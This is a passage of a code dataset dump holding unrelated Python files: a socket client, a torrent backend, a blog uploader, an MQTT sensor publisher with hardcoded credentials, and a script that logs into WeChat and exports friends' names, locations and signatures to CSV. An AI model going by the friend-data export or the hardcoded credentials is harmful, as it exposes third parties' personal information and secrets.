str(serverNames))\n\tdata_numbers = pickle.dumps(limitSet,protocol=2)\n\tclientSockets.send(data_numbers)\n\ndef sendToServerString(string): #Looping through servers and\n\t #sending the search limits 'range' to servers.\n\n\tprint(\"Sending string: \" + str(string))\n\tdata_numbers = pickle.dumps(string)\n\tclientSockets.send(data_numbers)\n\n\ndef getReplies(): #Getting replies from servers.\n\n\treplyAnswerSerialized = clientSockets.recv(1024) #Recieving data in Pickle format\n\n\treplyAnswerDeserialized = pickle.loads(replyAnswerSerialized)#Converting from Pickle format to 'array' format\n\n\tresults=(replyAnswerDeserialized[0]) #Extracting results from the array\n\ttimes=(replyAnswerDeserialized[1]) #Extracting search time\n\n\treturn results, times\n\ndef closeConnections(): #Closing connections to different servers.\n\n\tclientSockets.close()\n'''\nif __name__ == \"__main__\":#Main function\n\n\tcreateConnections()\t#Creates three connections to servers\n\tfor i in range(10):\n\t\t#createConnections()\t#Creates three connections to servers\n\t\t# lLimit = input(\"input lower limit \")\n\t\t# uLimit = input(\"input upper limit \")\n\t\tx = input(\"x \")\n\t\ty = input(\"y \")\n\t\tz = input(\"z \")\n\t\tax = input(\"ax \")\n\t\tay = input(\"ay \")\n\t\taz = input(\"az \")\n\t\t#string = input(\"Enter the string you wish to send\\n\")\n\t\tprint (\"\\n\")\n\t\tlimitSet = []\n\t\tstartTime=time.time() #Start of connection time\n\n\t\t# limitSet = [lLimit,uLimit] #Breaking range into sets\n\t\tlimitSet = [x, y, z, ax, ay, az]\n\t\tsendToServer(limitSet) #Sending sets to servers\n\n\t\tresults, times = getReplies() #Getting results and search times\n\t\t#replyAnswerSerialized = clientSockets.recv(1024)\n\t\t#replyAnswerDeserialized = pickle.loads(replyAnswerSerialized)\n\t\t#print(replyAnswerDeserialized)\n\t\telapsedTime = time.time() - startTime\n\n\t\ttotalResults = 0\n\t\ttotalTime = 0\n\n\t\tprint (\"got reply = \" + str(results) + \" from host \" +str(serverNames)+ \" after \" +str(times)+ \" seconds\")\n\t\ttotalResults = totalResults + results\n\t\ttotalTime = totalTime + times\n\tcloseConnections() #Closing all connections to servers.\n'''\n","sub_path":"client_old.py","file_name":"client_old.py","file_ext":"py","file_size_in_byte":2556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"90424638","text":"# Your code here\n# import math and random\nimport random\nimport math\n\n# declare the cache\nfastfun_cache = {}\n\n\ndef slowfun_too_slow(x, y):\n v = math.pow(x, y)\n v = math.factorial(v)\n v //= (x + y)\n v %= 982451653\n\n return v\n\n\ndef slowfun(x, y):\n \"\"\"\n Rewrite slowfun_too_slow() in here so that the program produces the same\n output, but completes quickly instead of taking ages to run.\n \"\"\"\n # Your code here\n # if the x and y are in the cache get if else get it from fn.\n if (x, y) in fastfun_cache:\n return fastfun_cache[(x, y)]\n else:\n v = math.pow(x, y)\n v = math.factorial(v)\n v //= (x + y)\n v %= 982451653\n\n return v\n\n\n# Do not modify below this line!\nfor i in range(50000):\n x = random.randrange(2, 14)\n y = random.randrange(3, 6)\n print(f'{i}: {x},{y}: {slowfun(x, y)}')\n","sub_path":"applications/lookup_table/lookup_table.py","file_name":"lookup_table.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"336077105","text":"import shifter\n\n\ndef shifter_monkey_patch():\n shifter_Client_list = shifter.Client.list\n\n def my_shifter_Client_list(self, *args, **kw):\n try:\n return shifter_Client_list(self, *args, **kw)\n except IndexError:\n return {}\n shifter.Client.list = my_shifter_Client_list\n\n\nclass TransmissionBackend(object):\n def __init__(self, client=shifter.Client()):\n if isinstance(client, shifter.Client):\n shifter_monkey_patch()\n self._client = client\n self._client.list_fields.add('is_finished')\n\n def add(self, torrent):\n try:\n self._client.torrent.add(filename=torrent.uri)\n except Exception as e:\n if e.args[0] == 'duplicate torrent':\n pass\n else:\n raise e\n\n def remove(self, torrent):\n return self._client.torrent.remove(torrent.id, delete_local_data=True)\n\n def list(self):\n # Transform shifter data, indexed by hashstr instead of by id\n rev = {}\n for (k, v) in self._client.list().items():\n v['id'] = k\n rev[v['hash_string'].lower()] = v.copy()\n\n is_finished = lambda x: x['is_finished']\n is_seeding = lambda x: x['status'].name == 'seeding'\n is_pending = lambda x: x['status'].name == 'download pending'\n is_downloading = lambda x: x['status'].name == 'downloading'\n #is_paused = lambda x: x['left_until_done'] > 0 and x['status'].name == 'stopped'\n\n for (k, v) in rev.items():\n alt = 'unknow'\n\n if v['status'].name == 'stopped':\n alt = 'done' if is_finished(v) else 'paused'\n\n else:\n if is_pending(v):\n alt = 'queued'\n if is_seeding(v):\n alt = 'seeding'\n if is_downloading(v):\n alt = 'downloading'\n\n v['state'] = alt\n del(v['status'])\n\n return rev\n\n def info(self, hashstr):\n l = self.list()\n\n hashstr = hashstr.lower()\n return l[hashstr] if hashstr in l else None\n","sub_path":"zizi/apps/bypass/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"493142345","text":"\n\nfrom xai.brain.wordbase.nouns._mildew import _MILDEW\n\n#calss header\nclass _MILDEWED(_MILDEW, ):\n\tdef __init__(self,): \n\t\t_MILDEW.__init__(self)\n\t\tself.name = \"MILDEWED\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"mildew\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_mildewed.py","file_name":"_mildewed.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"248902581","text":"import itchat\nimport matplotlib.pyplot as plt\nfrom collections import Counter\nimport re\nimport jieba\nfrom wordcloud import WordCloud, ImageColorGenerator\nfrom scipy.misc import imread\nimport pandas as pd\nimport os\nimport jieba.analyse\nimport numpy as np\nfrom PIL import Image\nfrom snownlp import SnowNLP\nimport csv\n\nprint(os.getcwd()) #获取当前工作路径\nos.chdir(r'C:\\Users\\Lenovo\\Desktop')\n# 可视化的中文处理\nplt.rcParams['font.sans-serif'] = 'SimHei'\nplt.rcParams['axes.unicode_minus'] = False\nplt.style.use('ggplot')\n\n# # 登陆微信\n# itchat.auto_login(hotReload=True)\n#\n# # 获取自己的好友列表\n# friends = itchat.get_friends(update=True)\n# # print(friends)\n#\n# # 好友总数, 第一个是自己\n# total = len(friends[1:])\n# print ('好友总数:', total)\n#\n# # 查看好友男友比例\n# male = female = other = 0\n# for friend in friends[1:]:\n# sex = friend['Sex']\n# if sex == 1:\n# male += 1\n# elif sex == 2:\n# female += 1\n# else:\n# other += 1\n# print(male)\n# print(female)\n# print(other)\n# sexes = list()\n# sexes.append(float(male) * 100 / total)\n# sexes.append(float(female) * 100 / total)\n# sexes.append(float(other) * 100 / total)\n#\n# print ('男性好友: %-.2f%%' % sexes[0])\n# print ('女性好友: %-.2f%%' % sexes[1])\n# print ('不明身份好友: %-.2f%%' % sexes[2])\n#\n# #draw(sexes, ['male', 'female', 'other'], 'Gender', 'Proportion', \"Gender's proportion of my friends\", type=0)\n#\n# all_information=[]\n# NickNames=[]\n# RemarkNames=[]\n# Sexs=[]\n# Provinces=[]\n# Citys=[]\n# Signatures=[]\n# for friend in friends:\n# NickNames.append(friend['NickName'])\n# RemarkNames.append(friend['RemarkName'])\n# Sexs.append(friend['Sex'])\n# Provinces.append(friend['Province'])\n# Citys.append(friend['City'])\n# Signatures.append(friend['Signature'])\n# all_information=[NickNames,RemarkNames,Sexs,Provinces,Citys,Signatures]\n# test = pd.DataFrame(all_information).T\n# # test.rename(columns={0:'NickNames',1:'Sexs',2:'Provinces',3:'Citys',4:'Signatures'}, inplace=True)\n# test.columns=['NickName','RemarkName','Sex','Province','City','Signature']\n# # print(test.info())\n# test.to_csv('weixin.csv', encoding='utf_8_sig',index=False)\n\n# DataFrame.to_csv(path_or_buf=None, sep=', ', na_rep='', float_format=None, columns=None,\n# header=True,index=True, index_label=None, mode='w', encoding=None, compression=None,\n# quoting=None, quotechar='\"',line_terminator='\\n', chunksize=None, tupleize_cols=None,\n# date_format=None, doublequote=True,escapechar=None, decimal='.')\n\n\n\n\n\n\n\n# signatures = list()\n# provinces = list()\n# cities = list()\n# 过滤掉签名中的冗余字符\n# pattern = re.compile('<[^>]+>')\n# for friend in friends:\n# if friend['Signature']:\n# signature = pattern.sub('', friend['Signature']).strip().replace('&', '')\n# signatures.append(signature)\n# provinces.append(friend['Province'] if friend['City'] else 'NULL')\n# cities.append(friend['City'] if friend['City'] else 'NULL')\n#\n#\n# # 绘制好友省份柱状图\n# pro = sorted(Counter(provinces).most_common(10), key=lambda d: -d[1])\n# label, num = zip(*pro)\n# #draw(num, label, 'Provinces', 'nums', 'Province distribute of my friends')\n#\n# # 绘制好友城市柱状图\n# cit = sorted(Counter(cities).most_common(10), key=lambda d: -d[1])\n# label, num = zip(*cit)\n# #draw(num, label, 'Cities', 'nums', 'City distribute of my friends')\n\n\n\n\n\n\n\ndef analyseSignature(friends):\n signatures = ''\n emotions = []\n pattern = re.compile(\"1f\\d.+\")\n for friend in friends:\n signature = friend['Signature']\n if(signature != None):\n signature = signature.strip().replace('span', '').replace('class', '').replace('emoji', '')\n signature = re.sub(pattern,'',signature)\n if(len(signature)>0):\n nlp = SnowNLP(signature)\n # print(nlp)\n # print(nlp.words) 分词\n # print(nlp.sentiments) 计算正向概率 权值\n # print(nlp.tags) 对词的属性进行分类\n # print(nlp.pinyin) #汉转拼音\n # print(nlp.tf) # 词频\n # print(nlp.idf) # 逆向文件频率\n emotions.append(nlp.sentiments)\n signatures += ' '.join(jieba.analyse.extract_tags(signature,5))\n with open('signatures.txt','wt',encoding='utf-8') as file:\n file.write(signatures)\n\n # Sinature WordCloud\n # back_coloring = np.array(Image.open('heart.jpg'))\n wordcloud = WordCloud(\n font_path='simfang.ttf',\n background_color=\"white\",\n max_words=1200,\n # mask=back_coloring,\n max_font_size=75,\n random_state=45,\n width=960,\n height=720,\n margin=15\n )\n\n wordcloud.generate(signatures)\n plt.imshow(wordcloud)\n plt.axis(\"off\")\n plt.show()\n wordcloud.to_file('signatures.jpg')\n\n # Signature Emotional Judgment\n count_good = len(list(filter(lambda x:x>0.66,emotions)))\n # print(list(filter(lambda x:x>0.66,emotions)))\n count_normal = len(list(filter(lambda x:x>=0.33 and x<=0.66,emotions)))\n count_bad = len(list(filter(lambda x:x<0.33,emotions)))\n labels = [u'负面消极',u'中性',u'正面积极']\n values = (count_bad,count_normal,count_good)\n plt.xlabel(u'情感判断')\n plt.ylabel(u'频数')\n plt.xticks(range(3),labels)\n plt.legend(loc='upper right',)\n plt.bar(range(3), values, color = 'rgb')\n plt.title('杨海��微信好友签名信息情感分析')\n plt.show()\n\n\ndef analyseSex(firends):\n sexs = list(map(lambda x:x['Sex'],friends[1:]))\n counts = list(map(lambda x:x[1],Counter(sexs).items()))\n labels = ['Unknow','Male','Female']\n colors = ['red','yellowgreen','lightskyblue']\n plt.figure(figsize=(8,5), dpi=80)\n plt.axes(aspect=1)\n plt.pie(counts, #性别统计结果\n labels=labels, #性别展示标签\n colors=colors, #饼图区域配色\n labeldistance = 1.1, #标签距离圆点距离\n autopct = '%3.1f%%', #饼图区域文本格式\n shadow = False, #饼图是否显示阴影\n startangle = 90, #饼图起始角度\n pctdistance = 0.6 #饼图区域文本距离圆点距离\n )\n plt.legend(loc='upper right',)\n plt.title(u'%s' % friends[0]['NickName'])\n plt.show()\n\n\ndef analyseLocation(friends):\n headers = ['NickName','RemarkName','Sex','Province','City','Signature']\n with open('location.csv','w',encoding=\"utf_8_sig\",newline='') as csvFile:\n writer = csv.DictWriter(csvFile, headers)\n writer.writeheader()\n for friend in friends[1:]:\n row = {}\n row['NickName'] = friend['NickName']\n row['RemarkName'] = friend['RemarkName']\n row['Sex'] = friend['Sex']\n row['Province'] = friend['Province']\n row['City'] = friend['City']\n row['Signature'] = friend['Signature']\n print(row)\n writer.writerow(row)\n\n# 登陆微信\nitchat.auto_login(hotReload=True)\n# 获取自己的好友列表\nfriends = itchat.get_friends(update=True)\n# 好友总数, 第一个是自己\n\ntotal = len(friends[1:])\nprint ('好友总数:', total)\n\n# analyseSignature(friends)\n# analyseSex(friends)\nanalyseLocation(friends)","sub_path":"321.py","file_name":"321.py","file_ext":"py","file_size_in_byte":7313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"157165246","text":"\"\"\"xlrd example\"\"\"\nimport xlrd\n\ndef open_excel(file='./py/HPE.PerfCore.TruClientFootprintTestData.xls'):\n \"\"\"open excel file\"\"\"\n try:\n data = xlrd.open_workbook(file)\n return data\n except Exception:\n print('exception throw')\n\ndef go_through_excel(file='./py/HPE.PerfCore.TruClientFootprintTestData.xls'):\n \"\"\"print rows in excel one by one\"\"\"\n data = open_excel(file)\n table = data.sheet_by_name('Footprint')\n for i in range(table.nrows):\n print(table.row_values(i))\n\ngo_through_excel()\n","sub_path":"py/xlrd_operate.py","file_name":"xlrd_operate.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"115849407","text":"\"\"\"Read customer data from file and run a raffle.\"\"\"\n\nfrom random import choice\n\n\nclass Customer(object):\n \"\"\"A customer at Ubermelon.\"\"\"\n\n def __init__(self, name, email, street, city, zipcode):\n self.name = name\n self.email = email\n self.street = street\n self.city = city\n self.zipcode = zipcode\n\n\ndef get_customers_from_file(customer_file_path):\n \"\"\"Read customer file and return list of customer objects.\n\n Read file at customer_file_path and create a customer object\n containing customer information.\n \"\"\"\n\n customers = []\n\n customer_file = open(customer_file_path)\n\n # Process a file like:\n #\n # customer-name | email | street | city | zipcode\n\n for line in customer_file:\n customer_data = line.strip().split(\"|\")\n name, email, street, city, zipcode = customer_data\n\n new_customer = Customer(name, email, street, city, zipcode)\n customers.append(new_customer)\n\n return customers\n\n\ndef pick_winner(customers):\n \"\"\"Choose a random winner from list of customers.\"\"\"\n\n chosen_customer = choice(customers)\n\n print(\"Tell {name} at {email} that they've won\".format(\n name=chosen_customer.name,\n email=chosen_customer.email\n ))\n\n\ndef run_raffle():\n \"\"\"Run the weekly raffle.\"\"\"\n\n customers = get_customers_from_file(\"customers.txt\")\n pick_winner(customers)\n\nif __name__ == '__main__':\n run_raffle()","sub_path":"melon-raffle/raffle.py","file_name":"raffle.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"113668326","text":"from tistorycmd import *\nimport mistune\n\nUSAGE = \"\"\"USAGE:\n # 블로그 정보 보기\n tistorycmd info\n\n # 카테고리 목록 보기\n tistorycmd category\n\n # 글쓰기, 모든 내용수정시\n tistorycmd post <제목> <내용|파일경로> <태그>\n \n # 내용만 수정\n tistorycmd update <내용|파일경로>\n \"\"\"\n\n\ndef main():\n if len(sys.argv) < 2:\n print(USAGE, file=sys.stderr)\n return\n\n auth = Auth() # 로그인, oauth, 토큰 관련 클래스\n blog = Blog() # 글쓰기, 블로그 관련 클래스\n command = sys.argv[1] # 메뉴\n if command == 'info':\n blog.info()\n elif command == 'category':\n blog.category_list()\n elif command == 'post':\n if len(sys.argv) < 4:\n print(USAGE, file=sys.stderr)\n return\n\n cont_path = os.path.abspath(sys.argv[3]) # 내용 파일 경로\n history_file = os.path.dirname(cont_path) + os.sep + '.tistory' # 기존 등록내역파일\n\n title = sys.argv[2] #제목\n category = (len(sys.argv) > 4) and sys.argv[4] or '' #카테고리 (필수 x)\n tags = (len(sys.argv) > 5) and sys.argv[5] or '' #태그 (필수 x)\n content_md = \"\" # 업로드할 파일내용 마크다운 형태\n overwrite_md = \"\" # 덮어 쓸 내용 (이미지 계속 업로드 되는거 방지)\n \n # 이미지 있을 경우 파일 업로드\n with open(cont_path, 'r', encoding='UTF8') as fp:\n for line in fp:\n name_grp = re.search('(\\!\\[\\s*)(\\w+)(\\s*\\])(\\(\\s*)([^http:\\/\\/].*)(\\s*\\))', line) # 이미지 형태 있는지 검사\n if (name_grp):\n content_md += blog.file_upload(line, os.path.dirname(cont_path))\n overwrite_md += blog.file_upload(line, os.path.dirname(cont_path))\n else:\n content_md += line\n overwrite_md += line\n\n # 파일내용 덮어쓰기 (이미지 계속 업로드 되는거 방지)\n if os.path.exists(cont_path):\n with open(cont_path, 'w', encoding='utf-8') as make_file:\n make_file.write(overwrite_md)\n\n content_html = mistune.markdown(content_md) # 업로드 할 파일 내용 html 형태\n if(os.path.isfile(history_file)):\n # 글수정\n blog.post_edit(history_file, title, content_html, category, tags)\n else:\n # 글쓰기\n blog.post_write(history_file, title, content_html, category, tags)\n elif command == 'update':\n if not sys.argv[2]:\n print(USAGE, file=sys.stderr)\n return\n\n cont_path = os.path.abspath(sys.argv[2]) # 내용 파일 경로\n history_file = os.path.dirname(cont_path) + os.sep + '.tistory' # 기존 등록내역파일\n\n # history 파일이 없을경우\n if not os.path.exists(history_file):\n print(\".tistory 파일이 없습니다.\")\n return\n\n # history 파일 읽기\n with open(history_file, 'r') as f:\n history = json.load(f)\n postId = (\"postId\" in history) and history['postId'] or ''\n title = (\"title\" in history) and history['title'] or '' # 제목\n category = (\"category\" in history) and history['category'] or '' # 카테고리 (필수 x)\n\n # postId 값 없을때\n if not postId:\n print('.history 파일 삭제후 다시 시도해보시기 바랍니다.')\n\n post_info = blog.post_read(postId)\n if post_info:\n title = post_info[\"title\"] # 제목\n category = post_info[\"categoryId\"] # 카테고리 (필수 x)\n content_md = \"\" # 업로드할 파일내용 마크다운 형태\n overwrite_md = \"\" # 덮어 쓸 내용 (이미지 계속 업로드 되는거 방지)\n\n # 이미지 있을 경우 파일 업로드\n with open(cont_path, 'r', encoding='UTF8') as fp:\n for line in fp:\n name_grp = re.search('(\\!\\[\\s*)(\\w+)(\\s*\\])(\\(\\s*)([^http:\\/\\/].*)(\\s*\\))', line) # 이미지 형태 있는지 검사\n if (name_grp):\n content_md += blog.file_upload(line, os.path.dirname(cont_path))\n overwrite_md += blog.file_upload(line, os.path.dirname(cont_path))\n else:\n content_md += line\n overwrite_md += line\n\n # 파일내용 덮어쓰기 (이미지 계속 업로드 되는거 방지)\n if os.path.exists(cont_path):\n with open(cont_path, 'w', encoding='utf-8') as make_file:\n make_file.write(overwrite_md)\n\n content_html = mistune.markdown(content_md) # 업로드 할 파일 내용 html 형태\n\n blog.contents_update(postId, title, content_html, category)\n else:\n print(USAGE, file=sys.stderr)\n return\n\n\nmain()","sub_path":"main_test.py","file_name":"main_test.py","file_ext":"py","file_size_in_byte":4941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"104026415","text":"import paho.mqtt.client as mqtt\nimport time\nfrom datetime import datetime\nimport ev3dev.ev3 as ev3\nfrom smbus import SMBus\nimport threading\n\nMQTT_SERVER = '192.168.137.10'\n\nMQTT_PENDULUM_STATE = 'pendulum_state_info'\n\nMODE_NORMAL = 0x00\nMODE_CALIBRATE = 0x43\nMODE_RESET = 0x52\n\nself_pendulum = None\n\nauth = {}\nauth['username']=\"link\"\nauth['password']=\"0123\"\n\nclass HTAngle:\n def __init__(self, bus_no, address):\n self.bus = SMBus(bus_no)\n self.address = address\n\n self.angle = 0 # angle, degrees(datetime.utcnow().strftime('%H-%M-%S.%f')[:-3]0 - 359)\n self.acc_angle = 0 # accumulated angle, degrees(-2147483648 - 2147483647)\n self.rpm = 0 # rotations per minute (-1000 to 1000)\n\n self.current_data1_bit = False\n self.current_data2_bit = False\n self.last_data1_bit = False\n self.last_data2_bit = False\n\n self.update()\n\n def set_mode(self, mode):\n self.bus.write_byte_data(self.address, 0x41, mode)\n\n def get_mode(self):\n return self.bus.read_byte_data(self.address, 0x41)\n\n def reset(self):\n # reset accumulated angle\n self.set_mode(MODE_RESET)\n time.sleep(0.1)\n\n # calibrate angle\n self.set_mode(MODE_CALIBRATE)\n time.sleep(0.1)\n\n self.update()\n\n def update(self):\n ########################################################################\n ### * ERROR FILTERING! ###\n ### (1) data = 0xff ###\n ### (2) data[1]의 최상위 비트 반전 (data[0]의 최상위비트) ###\n ### (3) data[2]의 최상위 비트 반전 ###\n ########################################################################\n isError = True\n while isError:\n try:\n data = self.bus.read_i2c_block_data(self.address, 0x41, 10)\n # error filtering (1)\n if data[1] == data[2] == data[3] == data[4] == data[5] == data[6] == data[7] == data[8] == 0xff:\n isError = True\n time.sleep(0.0001)\n continue\n if data[2] == 0xff:\n isError = True\n time.sleep(0.0001)\n continue\n # not error\n else:\n isError = False\n except (TypeError, OSError) as e:\n print(\"update error: {0}\".format(str(e)))\n isError = True\n time.sleep(0.0001)\n\n # error filtering (3)\n self.current_data1_bit = True if data[1] & 0x20 == 0x20 else False\n self.current_data2_bit = True if data[2] & 0x80 == 0x80 else False\n if self.last_data1_bit and self.last_data2_bit:\n if self.current_data1_bit and not self.current_data2_bit:\n data[2] = data[2] | 0x80\n self.last_data1_bit = self.current_data1_bit\n self.last_data2_bit = self.current_data2_bit\n\n # angle\n self.angle = (data[1] & 0x7f) * 2 + (data[2] & 0x01) + ((data[2] & 0x80) << 1) # error filtering (2)\n\n # accumulated angle\n acc = (((data[3] & 0x7f) + (data[4] & 0x80)) * 0x1000000)\\\n + (((data[4] & 0x7f) + (data[5] & 0x80)) * 0x10000)\\\n + (((data[5] & 0x7f) + (data[6] & 0x80)) * 0x100)\\\n + ((data[6] & 0x7f) + (data[7] & 0x80))\n\n # convert to signed\n if acc > 0x7fffffff:\n self.acc_angle = (0x100000000 - acc) * (-1)\n else:\n self.acc_angle = acc\n\n # rpm\n rpm = (data[7] & 0x7f) * 0x100 + (data[8] & 0x7f) + (data[9] & 0x80)\n\n # convert to signed\n if rpm > 0x3fff:\n self.rpm = (0x8000 - rpm) * (-1)\n else:\n self.rpm = rpm\n return (self.angle, self.acc_angle, self.rpm)\n\n\nclass Pendulum:\n def __init__(self, pub, hta):\n global self_pendulum\n self_pendulum = self\n\n self.pub = pub\n self.hta = hta\n\n self.angle = 0\n\n self.isReady = False\n\n def timer_thread(self):\n print()\n print(\"***** update and pub pendulum angle started! (30 ms) *****\")\n while True:\n self.isReady = True\n # time.sleep(0.015)\n time.sleep(0.03)\n\n def update_and_pub_thread(self):\n while True:\n if self.isReady:\n self.isReady = False\n self.angle, _, _ = self.hta.update() # [angle, acc_angle, rpm]\n self.angle = str(self.angle - 180)\n self.pub.publish(\n topic=MQTT_PENDULUM_STATE,\n payload=self.angle + '|' + datetime.utcnow().strftime('%S.%f')[:-3]\n )\n else:\n time.sleep(0.0001)\n\n\nif __name__ == \"__main__\":\n while True:\n try:\n port = ev3.LegoPort(\"pistorms:BBS2\")\n if port.mode != \"i2c-thru\":\n port.mode = \"i2c-thru\"\n break\n except Exception as e:\n print(\"I/O exception: {0}\".format(str(e)))\n time.sleep(0.1)\n\n hta = HTAngle(1, 0x01)\n hta.reset()\n\n pub = mqtt.Client(client_id=\"pendulum_pub\", transport=\"TCP\")\n pub.username_pw_set(username=\"link\", password=\"0123\")\n pub.connect(MQTT_SERVER, 1883, 60)\n\n pendulum = Pendulum(pub, hta)\n\n timer_thread = threading.Thread(target=pendulum.timer_thread)\n update_and_pub_thread = threading.Thread(target=pendulum.update_and_pub_thread)\n\n timer_thread.daemon = True\n update_and_pub_thread.daemon = True\n\n timer_thread.start()\n update_and_pub_thread.start()\n\n while True:\n time.sleep(1)\n","sub_path":"05.EdgeX/edgex_client/pendulum/EV3_pub_timer.py","file_name":"EV3_pub_timer.py","file_ext":"py","file_size_in_byte":5788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"581493831","text":"def rgb2hex(C,g=None,b=None):\n if len(C)==3 :\n r=C[0]\n g=C[1]\n b=C[2]\n if r<1.1 and g<1.1 and b<1.1:\n r=r*255\n g=g*255\n b=b*255\n \n return '#%02X%02X%02X' % (r,g,b)\n\n\ndef fColrs_hex(*args):\n return rgb2hex(fColrs(*args))\n\ndef fColrs(i=-1,n=-1,bBW=True):\n # Possible calls\n# M=fColrs() : returns a nx3 matrix of RBG colors\n# C=fColrs(i) : cycle through colors, modulo the number of color\n# G=fColrs(i,n) : return a grey color (out of n), where i=1 is black\n# % Thrid argument add a switch possibility between black and white or colors:\n# % G=fColrs(i,n,1) : return a grey color (out of n), where i=1 is black\n# % G=fColrs(i,n,0) : cycle through colors\n import numpy as np\n# \n MathematicaBlue = np.array([63,63,153])/255. ; \n MathematicaRed = np.array([153,61,113])/255. ; \n MathematicaGreen = np.array([61,153,86])/255. ; \n MathematicaYellow = np.array([152,140,61])/255. ; \n MathematicaLightBlue = np.array([159,159,204 ])/255. ; \n MathematicaLightRed = np.array([204,158,184 ])/255. ; \n MathematicaLightGreen = np.array([158,204,170 ])/255. ; \n # \n ManuDarkBlue = np.array([0,0,0.7 ]) ; \n ManuDarkRed = np.array([138,42,93])/255. ; \n ManuDarkOrange = np.array([245,131,1])/255. ; \n ManuDarkOrange = np.array([198,106,1])/255. ; \n ManuLightOrange = np.array([255.,212,96])/255. ; \n # \n Red = np.array([1,0,0]) ; \n Blue = np.array([0,0,1]) ; \n Green = np.array([0,0.6,0]) ; \n Yellow = np.array([0.8,0.8,0]); \n\n MatlabGreen = np.array([0,0.5,1 ] );\n MatlabCyan = np.array([0.0e+0 , 750.0e-03 , 750.0e-03 ] );\n MatlabMagenta = np.array([ 750.0e-03 , 0.0e+0 , 750.0e-03 ] );\n MatlabYellow = np.array([750.0e-03 , 750.0e-03 , 0.0e+0 ] );\n MatlabGrey = np.array([250.0e-03 , 250.0e-03 , 250.0e-03 ] );\n\n\n # Table of Color used\n mcolrs=np.array([\n MathematicaBlue,\n MathematicaGreen,\n ManuDarkRed,\n ManuDarkOrange,\n MathematicaLightBlue,\n MathematicaLightGreen,\n MathematicaLightRed,\n ManuLightOrange,\n Blue,\n Green,\n Red,\n Yellow,\n MatlabCyan,\n MatlabMagenta ]);\n # \n if i==-1:\n return mcolrs\n elif (i!=-1 and n==-1):\n return mcolrs[np.mod(i-1,len(mcolrs)),:];\n elif (i!=-1 and n!=-1):\n if bBW:\n if n==1:\n return [0,0,0]\n else:\n return [0.55,0.55,0.55]*(v-1)/(n-1); #grayscale\n else:\n return mcolrs[mod(i-1,len(mcolrs,1)),:];\n else:\n return mcolrs\n \n# \ndef test_colrs():\n\n #from ebra.plot import *\n from numpy import linspace,sin,pi\n from matplotlib import pyplot as plt\n\n x=linspace(0,2*pi,100);\n plt.figure()\n plt.title('fig_python')\n plt.grid()\n for i in range(30):\n plt.plot(x,sin(x)+i,'-',color=fColrs(i))\n plt.xlabel('x coordinate [m]')\n plt.ylabel('Velocity U_i [m/s]')\n plt.xlim([0,2*pi])\n\n plt.show()\nif __name__ == \"__main__\":\n test_colrs()\n","sub_path":"path/PythonPath/ebra/plot/colors.py","file_name":"colors.py","file_ext":"py","file_size_in_byte":3237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"262888782","text":"import math\n\nclass Object:\n #this is a generic object: the player, a monster, an item, the stairs...\n #it's always represented by a character on screen.\n def __init__(self, x, y, char, name, blocks=False, fighter=None, ai=None, item=None):\n self.x = x\n self.y = y\n self.char = char\n self.name = name\n self.blocks = blocks\n self.fighter = fighter\n self.ai = ai\n self.item = item\n\n if self.fighter: # let the fighter component know who owns it\n self.fighter.owner = self\n\n if self.ai: # let the AI component know who owns it\n self.ai.owner = self\n\n if self.item: # let the Item component know who owns it\n self.item.owner = self\n\n def move(self, dx, dy, dungeon):\n #move by the given amount, if the destination is not blocked\n if not is_blocked(self.x + dx, self.y + dy, dungeon):\n self.x += dx\n self.y += dy\n\n def get(self, player):\n if (self.x, self.y) in player.fov_coords:\n return self\n\n def clear(self):\n del self\n\n def move_towards(self, target_x, target_y, dungeon):\n #vector from this object to the target, and distance\n dx = target_x - self.x\n dy = target_y - self.y\n distance = math.sqrt(dx ** 2 + dy ** 2)\n\n #normalize it to length 1 (preserving direction), then round it and\n #convert to integer so the movement is restricted to the map grid\n dx = int(round(dx / distance))\n dy = int(round(dy / distance))\n self.move(dx, dy, dungeon)\n\n def distance_to(self, other):\n #return the distance to another object\n dx = other.x - self.x\n dy = other.y - self.y\n return math.sqrt(dx ** 2 + dy ** 2)\n\n\ndef send_to_back(obj, objects):\n # make this object be drawn first, so all others appear above it if\n # they're in the same tile.\n\n objects.remove(obj)\n objects.insert(0, obj)\n\n\ndef is_blocked(x, y, dungeon):\n #first test the map tile\n if dungeon.map[x][y].blocked:\n return True\n\n #now check for any blocking objects\n for object in dungeon.objects:\n if object.blocks and object.x == x and object.y == y:\n return True\n\n return False","sub_path":"common/object.py","file_name":"object.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"15447485","text":"import sys\nfrom gomatic import GoCdConfigurator, HostRestClient, ExecTask\n\nconfigurator = GoCdConfigurator(HostRestClient(\"localhost:8153\"))\n\npipeline_name = sys.argv[1]\n\npipeline = configurator\\\n .ensure_pipeline_group(\"auto-created\")\\\n .find_pipeline(pipeline_name)\n\nfor stage in pipeline.stages()[1:]:\n pipeline.ensure_removal_of_stage(stage.name())\n\ncommands = open(\"commands.txt\").readlines()\nfor command in commands:\n command_name, thing_to_execute = command.strip().split('=')\n pipeline\\\n .ensure_stage(command_name)\\\n .ensure_job(command_name)\\\n .ensure_task(ExecTask(thing_to_execute.split(\" 